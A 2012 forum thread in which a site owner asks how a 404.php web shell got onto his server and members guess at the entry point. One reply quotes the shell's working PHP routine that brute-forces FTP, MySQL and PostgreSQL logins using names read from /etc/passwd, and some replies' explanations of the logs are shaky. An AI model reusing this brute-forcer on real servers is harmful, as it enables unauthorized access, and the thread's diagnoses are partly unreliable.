Site Hacked With 404.php Shell - More Info?

General technological topics without their own forum go here

Site Hacked With 404.php Shell - More Info?

Post by olimits7 on Thu Oct 04, 2012 3:58 pm
([msg=69925]see Site Hacked With 404.php Shell - More Info?[/msg])

Hi,

My website was hacked using the following 404.php shell file, which I found uploaded to my site. I checked my logs and I can see that the point of entry was through http and not ftp or ssh.

http://pastebin.com/pXACCsW4

I'm new to this whole area, and I'm just trying to learn more about it and also how to protect myself better.

I see in the http log file there are a bunch of "GET" lines, but then all of suddend I can see a "POST" line show up showing the upload of the 404.php file. I'm trying to find out how exactly was this hacker able to post this file to my site.

The only entry points I can think of is I have Kayako Live Chat on my website; could this file be injected through this Live Chat feature? Or I also have a WordPress blog on my site; could this file been injected via posting comments or trackbacks on the blog?

Thank you!
olimits7
New User
New User
 
Posts: 3
Joined: Thu Oct 04, 2012 3:50 pm
Blog: View Blog (0)


Re: Site Hacked With 404.php Shell - More Info?

Post by limdis on Thu Oct 04, 2012 4:01 pm
([msg=69926]see Re: Site Hacked With 404.php Shell - More Info?[/msg])

Wow that's a lot of code. Give us some time to go over it.
"The quieter you become, the more you are able to hear..."
"Drink all the booze, hack all the things."
User avatar
limdis
Moderator
Moderator
 
Posts: 1433
Joined: Mon Jun 28, 2010 5:45 pm
Blog: View Blog (0)


Re: Site Hacked With 404.php Shell - More Info?

Post by olimits7 on Thu Oct 04, 2012 4:07 pm
([msg=69929]see Re: Site Hacked With 404.php Shell - More Info?[/msg])

I ended up uploading it back to my site and changed the md5 hashed password to something else, and it basically loads a "windows explorer" type page which gives the hacker full site to the server.

I am impressed of the creator of this shell script, but upset that I had to experience the attack first hand! So this is why I'm trying to figure out what entry points or how this hacker could have gotten this file on my server to begin with.

Thanks!
olimits7
New User
New User
 
Posts: 3
Joined: Thu Oct 04, 2012 3:50 pm
Blog: View Blog (0)


Re: Site Hacked With 404.php Shell - More Info?

Post by centip3de on Thu Oct 04, 2012 6:14 pm
([msg=69932]see Re: Site Hacked With 404.php Shell - More Info?[/msg])

olimits7 wrote:Hi,

My website was hacked using the following 404.php shell file, which I found uploaded to my site. I checked my logs and I can see that the point of entry was through http and not ftp or ssh.

http://pastebin.com/pXACCsW4

I'm new to this whole area, and I'm just trying to learn more about it and also how to protect myself better.

I see in the http log file there are a bunch of "GET" lines, but then all of suddend I can see a "POST" line show up showing the upload of the 404.php file. I'm trying to find out how exactly was this hacker able to post this file to my site.

The only entry points I can think of is I have Kayako Live Chat on my website; could this file be injected through this Live Chat feature? Or I also have a WordPress blog on my site; could this file been injected via posting comments or trackbacks on the blog?

Thank you!


No, I'm pretty sure your server just got brute-forced. I'm assuming that's what all the GET lines are, and why this function exists in the posted code:

Code: Select all
function actionBruteforce() {
    printHeader();
    if( isset($_POST['proto']) ) {
        echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
        if( $_POST['proto'] == 'ftp' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $fp = @ftp_connect($ip, $port?$port:21);
                if(!$fp) return false;
                $res = @ftp_login($fp, $login, $pass);
                @ftp_close($fp);
                return $res;
            }
        } elseif( $_POST['proto'] == 'mysql' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
                @mysql_close($res);
                return $res;
            }
        } elseif( $_POST['proto'] == 'pgsql' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
                $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
                @pg_close($res);
                return $res;
            }
        }
        $success = 0;
        $attempts = 0;
        $server = explode(":", $_POST['server']);
        if($_POST['type'] == 1) {
            $temp = @file('/etc/passwd');
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = explode(":", $line);
                    ++$attempts;
                    if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
                    }
                    if(@$_POST['reverse']) {
                        $tmp = "";
                        for($i=strlen($line[0])-1; $i>=0; --$i)
                            $tmp .= $line[0][$i];
                        ++$attempts;
                        if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
                            $success++;
                            echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
                        }
                    }
                }
        } elseif($_POST['type'] == 2) {
            $temp = @file($_POST['dict']);
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = trim($line);
                    ++$attempts;
                    if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
                    }
                }
        }
        echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
    }
    echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
        .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
        .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
        .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
        .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
        .'<span>Server:port</span></td>'
        .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
        .'<tr><td><span>Brute type</span></td>'
        .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
        .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
        .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
        .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
        .'<td><input type=text name=login value="komsen"></td></tr>'
        .'<tr><td><span>Dictionary</span></td>'
        .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
        .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
    echo '</div><br>';
    printFooter();
}


Then once he gained access, it looks like he uploaded this script to your server, and was able to open a backdoor, of sorts (which is why 90% of that code is just normal shell commands).
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -Rick Cook
User avatar
centip3de
Moderator
Moderator
 
Posts: 1467
Joined: Fri Aug 20, 2010 5:46 pm
Blog: View Blog (0)


Re: Site Hacked With 404.php Shell - More Info?

Post by olimits7 on Thu Oct 04, 2012 6:21 pm
([msg=69933]see Re: Site Hacked With 404.php Shell - More Info?[/msg])

Thank you for your reply!

Probably mid-September, my WordPress blog site got hit hard where I noticed a bunch of trackback links being posted and comments. At that time, I had comments to "automatically" be approved. As soon as I saw this; I changed my blog settings to have each comment be approved and to stop linking to trackpacks, but I'm guessing I was to late at this point.

How exactly does a brute-force attack work, where by using "GET" they are able to upload the 404.php file to my site?

Could this be done through Kayako Live Chat or through Wordpress comments/trackback links?

Thank you, again!
olimits7
New User
New User
 
Posts: 3
Joined: Thu Oct 04, 2012 3:50 pm
Blog: View Blog (0)


Re: Site Hacked With 404.php Shell - More Info?

Post by LoGiCaL__ on Thu Oct 04, 2012 9:17 pm
([msg=69940]see Re: Site Hacked With 404.php Shell - More Info?[/msg])

I think you would be better off posting the log. Just take out ip addresses or any identifying info.
User avatar
LoGiCaL__
Addict
Addict
 
Posts: 1063
Joined: Sun May 30, 2010 12:33 pm
Blog: View Blog (0)


Re: Site Hacked With 404.php Shell - More Info?

Post by limdis on Thu Oct 04, 2012 9:20 pm
([msg=69942]see Re: Site Hacked With 404.php Shell - More Info?[/msg])

LoGiCaL__ wrote:I think you would be better off posting the log. Just take out ip addresses or any identifying info.

This. Weekend and I looked at this for a little while and what we found was interesting. But we'll need logs to confirm our suspicions.
"The quieter you become, the more you are able to hear..."
"Drink all the booze, hack all the things."
User avatar
limdis
Moderator
Moderator
 
Posts: 1433
Joined: Mon Jun 28, 2010 5:45 pm
Blog: View Blog (0)


Re: Site Hacked With 404.php Shell - More Info?

Post by centip3de on Thu Oct 04, 2012 11:39 pm
([msg=69949]see Re: Site Hacked With 404.php Shell - More Info?[/msg])

olimits7 wrote:How exactly does a brute-force attack work, where by using "GET" they are able to upload the 404.php file to my site?


A brute-force attack is where someone tries every single password combination there is (from a-AAAAAAAAAAAAA), one after another. By doing this, they are able to crack your password, without knowing it. However, the downfall to this attack is that it is very, very, VERY, time consuming and takes a lot of tries (what I'm assuming all the GET requests were). The POST request could be a number of things, but I'm assuming that it's the server allowing him in. From the server, he probably downloaded his script via FTP onto your server, and there it lied.

Or, the POST command somehow enabled him to download the file onto your server via FTP (or another protocol) and he then busted in through there.

olimits7 wrote:Could this be done through Kayako Live Chat or through Wordpress comments/trackback links?
Thank you, again!


No. This can only be done through something that accepts a user/pass combination, such as a login. And, because he was able to get something onto your server, I'm assuming that it was the login to your server (also most likely why there are port scanning functions in the script).
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -Rick Cook
User avatar
centip3de
Moderator
Moderator
 
Posts: 1467
Joined: Fri Aug 20, 2010 5:46 pm
Blog: View Blog (0)


Re: Site Hacked With 404.php Shell - More Info?

Post by weekend hacker on Fri Oct 05, 2012 4:50 pm
([msg=69959]see Re: Site Hacked With 404.php Shell - More Info?[/msg])

centip3de wrote:No. This can only be done through something that accepts a user/pass combination, such as a login. And, because he was able to get something onto your server, I'm assuming that it was the login to your server (also most likely why there are port scanning functions in the script).

Although Wordpress makes it easy to update there could be some vuln plugin or some other web angle that wouldn't require a password.
And with shared hosting it you could have set bad modes on your directories allowing anyone else with an account to write to it.(really though, what kind of hosting doesn't at least pretend to prevent this?) There are so many potential ways to get in its nearly impossible to tell without those logs and more information.

As for the backdoor itself, I'm assuming that paste wasn't the one used on your machine but something you googled?
The reason I think this is because the paste ID is the exact same one as the one used in the blog post of the site mentioned in that shell. (password: HACKED)
And version 2.5 of that shell looks prettyer(and windows support/windows only?)

EDIT: by the top part I mean maybe it wasn't brute force but an actual exploit in one of the many 3rd party things you probably use.
<Yoda> if someone says something i don't like, i ban him, ban whoever defends him, and then ban the witnesses...
User avatar
weekend hacker
Administrator
Administrator
 
Posts: 192
Joined: Sun Apr 13, 2008 2:39 pm
Location: 127.0.0.1
Blog: View Blog (0)


Re: Site Hacked With 404.php Shell - More Info?

Post by centip3de on Sat Oct 06, 2012 4:51 pm
([msg=69983]see Re: Site Hacked With 404.php Shell - More Info?[/msg])

weekend hacker wrote:Although Wordpress makes it easy to update there could be some vuln plugin or some other web angle that wouldn't require a password.
And with shared hosting it you could have set bad modes on your directories allowing anyone else with an account to write to it.(really though, what kind of hosting doesn't at least pretend to prevent this?) There are so many potential ways to get in its nearly impossible to tell without those logs and more information.


I'd be really interested in a bruteforce attack that didn't require a user/pass combination, personally. ;)
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -Rick Cook
User avatar
centip3de
Moderator
Moderator
 
Posts: 1467
Joined: Fri Aug 20, 2010 5:46 pm
Blog: View Blog (0)



Return to General

Who is online

Users browsing this forum: No registered users and 0 guests